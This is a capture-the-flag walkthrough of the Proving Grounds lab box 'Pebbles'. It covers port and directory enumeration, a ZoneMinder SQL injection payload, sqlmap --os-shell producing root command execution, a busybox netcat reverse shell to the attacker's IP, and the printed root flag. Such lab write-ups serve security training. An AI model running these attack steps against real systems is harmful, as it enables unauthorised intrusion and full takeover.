Pebbles

Enumeration:

Port Scanning:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pebbles]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.215.52
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-07 02:25 EST
Nmap scan report for 192.168.215.52
Host is up, received reset ttl 61 (0.23s latency).
Scanned at 2025-11-07 02:25:03 EST for 52s
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE SERVICE REASON         VERSION
21/tcp   open  ftp     syn-ack ttl 61 vsftpd 3.0.3
22/tcp   open  ssh     syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 aa:cf:5a:93:47:18:0e:7f:3d:6d:a5:af:f8:6a:a5:1e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDTlsFY1sjAxyC1lqlzeHAaSC0ec76cB5Hoq6aVwMNphXzrhslKqJJ5L0sjOjQem02G6wukOQ/qIVzUZOPxdn4tlN+YuCRqrE7nSIj36hh6JeG4cI9t3qOJUPndLKuKSyJKwV1Dl7gQKcjS0gxO6kWybHMf4CT9a8QsF8mLDPNU3p5VfsEdrgJ+q5hNOmLYJPqwIHTdCweuSwaORn9wQGlmKphGZJlktEKEPwecDZO5KUc6g3N23G+vWv2uCmAw9ov8AQrePxdjz5/QQ8PdY6zedwcLUFjmL5jx9UhZLhDDf/pzP0wiswgm7DZXG6WHwMCbxNo0zX4/HFDswDHc/W+J
|   256 c7:63:6c:8a:b5:a7:6f:05:bf:d0:e3:90:b5:b8:96:58 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOrgGvGclvZKKtoTk+H0ojQxTTSKljSVFLY8udD6Cb8OQLjgd5F48Em8sa7JjoCa4Mn3USw7EttQLL9a1RNEgio=
|   256 93:b2:6a:11:63:86:1b:5e:f5:89:58:52:89:7f:f3:42 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBSm8eCxMlgt56SQ1z3TjY8R0ZY2MMMlYTB4Bby39xXE
80/tcp   open  http    syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Pebbles
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 7EC7ACEA6BB719ECE5FCE0009B57206B
|_http-server-header: Apache/2.4.18 (Ubuntu)
3305/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
8080/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-favicon: Apache Tomcat
|_http-title: Tomcat
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

<snipped>

We have three ports running http, and ssh on port 22.

HTTP (8080):

Just tomcat welcoming page without any functioning.

HTTP (3305):

The same for tomcat.

HTTP (80):

I tried default credentials, sql injection, but nothing worked.

Lets try directory fuzzing:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pebbles]
└─$ gobuster dir -u http://192.168.215.52/ -w /usr/share/wordlists/dirb/big.txt -x php -t 40
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.215.52/
[+] Method:                  GET
[+] Threads:                 40
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess.php        (Status: 403) [Size: 279]
/.htpasswd.php        (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/.htaccess            (Status: 403) [Size: 279]
/cgi-bin/             (Status: 403) [Size: 279]
/cgi-bin/.php         (Status: 403) [Size: 279]
/css                  (Status: 301) [Size: 314] [--> http://192.168.215.52/css/]
/images               (Status: 301) [Size: 317] [--> http://192.168.215.52/images/]
/index.php            (Status: 200) [Size: 1134]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.215.52/javascript/]
/server-status        (Status: 403) [Size: 279]
/zm                   (Status: 301) [Size: 313] [--> http://192.168.215.52/zm/]
Progress: 40938 / 40938 (100.00%)
===============================================================
Finished
===============================================================

We will find a strange directory named zm, browse to this:

We have some sort of a service called zoneminder with its version exposed to us.

Exploitation:

Lets search for any public exploit on that version:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pebbles]                                                                                                                   
└─$ searchsploit zoneminder 1.29                                                                                                                                           
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                           |  Path                           
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Zoneminder 1.29/1.30 - Cross-Site Scripting / SQL Injection / Session Fixation / Cross-Site Request Forgery                              | php/webapps/41239.txt           
ZoneMinder Snapshots < 1.37.33 - Unauthenticated RCE                                                                                     | php/webapps/51902.py            
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Copy the first one:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pebbles]
└─$ searchsploit -m php/webapps/41239.txt
  Exploit: Zoneminder 1.29/1.30 - Cross-Site Scripting / SQL Injection / Session Fixation / Cross-Site Request Forgery
      URL: https://www.exploit-db.com/exploits/41239
     Path: /usr/share/exploitdb/exploits/php/webapps/41239.txt
    Codes: N/A
 Verified: False
File Type: HTML document, ASCII text
Copied to: /home/kali/Desktop/CTF/Machines/OffsecPG/Practice/Pebbles/41239.txt

Lets inspect the file to see what we can find:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pebbles]
└─$ cat 41239.txt
<snipped>

2)SQL Injection
Example Url:http://192.168.241.131/zm/index.php
Parameter: limit (POST)
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: view=request&request=log&task=query&limit=100;(SELECT *
FROM (SELECT(SLEEP(5)))OQkj)#&minTime=1466674406.084434
Easy exploitable using sqlmap.

Lets use sqlmap to find the vulnerability and exploit it to get shell on the target if we have access as a high privileged user:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pebbles]                                                                                                                   
└─$ sqlmap http://192.168.215.52:8080/zm/index.php --data="view=request&request=log&task=query&limit=100&minTime=5" --os-shell                                             
        ___                                                                                                                                                                
       __H__                                                                                                                                                               
 ___ ___[(]_____ ___ ___  {1.9.10#stable}                                                                                                                                  
|_ -| . [)]     | .'| . |                                                                                                                                                  
|___|_  ["]_|_|_|__,|  _|                                                                                                                                                  
      |_|V...       |_|   https://sqlmap.org
      
<snipped>

[02:46:52] [INFO] POST parameter 'limit' appears to be 'MySQL >= 5.0.12 stacked queries (comment)'' injectable

<snipped>

sqlmap identified the following injection point(s) with a total of 2326 HTTP(s) requests:
---
Parameter: limit (POST)
    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: view=request&request=log&task=query&limit=100;SELECT SLEEP(5)#&minTime=5 
---
[02:47:57] [INFO] the back-end DBMS is MySQL
[02:47:57] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
web server operating system: Linux Ubuntu 16.10 or 16.04 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
[02:47:58] [INFO] fingerprinting the back-end DBMS operating system
[02:47:58] [INFO] the back-end DBMS operating system is Linux
[02:47:59] [INFO] testing if current user is DBA
[02:47:59] [INFO] fetching current user
[02:47:59] [INFO] retrieved: 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] 

[02:48:19] [INFO] adjusting time delay to 1 second due to good response times
root@localhost
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit

Select 2:

> 2
[02:49:30] [INFO] checking if UDF 'sys_exec' already exist
[02:49:30] [INFO] checking if UDF 'sys_eval' already exist
[02:49:30] [INFO] detecting back-end DBMS version from its banner
[02:49:30] [INFO] retrieved: 5.7.30-0ubuntu0.16.0
<snipped>
[02:57:12] [INFO] the local file '/tmp/sqlmapgcef_yle12662/lib_mysqludf_sys2loln42s.so' and the remote file '/usr/lib/mysql/plugin/libsbvjw.so' have the same size (8040 B)
[02:57:13] [INFO] creating UDF 'sys_exec' from the binary UDF file
[02:57:13] [INFO] creating UDF 'sys_eval' from the binary UDF file
[02:57:14] [INFO] going to use injected user-defined functions 'sys_eval' and 'sys_exec' for operating system command execution
[02:57:14] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] Y
[04:27:52] [INFO] retrieved: root

So the user running this mysql services is the root user, and we have an sqlmap shell as root.

Lets get an interactive shell.

Start a netcat listener:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pebbles]
└─$ nc -nlvp 3305
listening on [any] 3305 ...

os-shell> busybox nc 192.168.45.174 3305 -e bash
do you want to retrieve the command standard output? [Y/n/a] Y
[04:42:58] [INFO] retrieved:  
command standard output: ' '

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pebbles]
└─$ nc -nlvp 3305
listening on [any] 3305 ...
connect to [192.168.45.174] from (UNKNOWN) [192.168.215.52] 54738

Here we have a connection back from the target.

Since we are root, lets get the root flag:

whoami
root
cd /root
ls
proof.txt
cat proof.txt
d135189cae5eef88d3fd1ce69894ec6a

PreviousBratarina NextNibbles

Last updated 3 months ago

hashtagEnumeration:

hashtagPort Scanning:

hashtagHTTP (8080):

hashtagHTTP (3305):

hashtagHTTP (80):

hashtagExploitation: